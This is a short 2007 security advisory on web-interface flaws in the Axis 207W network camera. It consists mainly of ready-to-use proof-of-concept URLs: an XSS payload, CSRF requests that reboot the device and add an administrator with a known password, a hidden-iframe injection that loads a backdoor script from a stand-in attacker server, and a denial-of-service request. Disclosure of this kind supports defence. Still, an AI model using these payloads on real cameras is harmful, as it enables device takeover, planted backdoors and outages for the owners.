

Title Axis Communications 207W Network Camera Web Interface Vulnerabilities
Published 2007-09-14-12:00AM
Updated 2007-09-17-06:30PM
Class Unknown
CVE  
Remote  Yes
Local  No
Credit  Discovery is credited to Seth Fogie.
Vulnerable  Axis Communications 207W Network Camera 0
Not Vulnerable  
Code  The following examples were provided:

Cross-site scripting:
http://www.example.com/incl/image_incl.shtml?camNo=</script><script>alert(String.fromCharCode(88,83,83))</script>

Cross-site request forgery:
1. Reboot the camera - http://www.example.com/axis-cgi/admin/restart.cgi
2. Add a new administrator -
http://www.example.com/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.shtml%3Fpageclose%3D1
3. Root the camera/add a backdoor -
http://www.example.com/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe src=http://www.evilserver.com/wifi/axisrb.htm><!--

Denial of service:
http://www.example.com/axis-cgi/buffer/command.cgi?do=start&buffername=<unique buffer name>

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 08:40:29 +0000
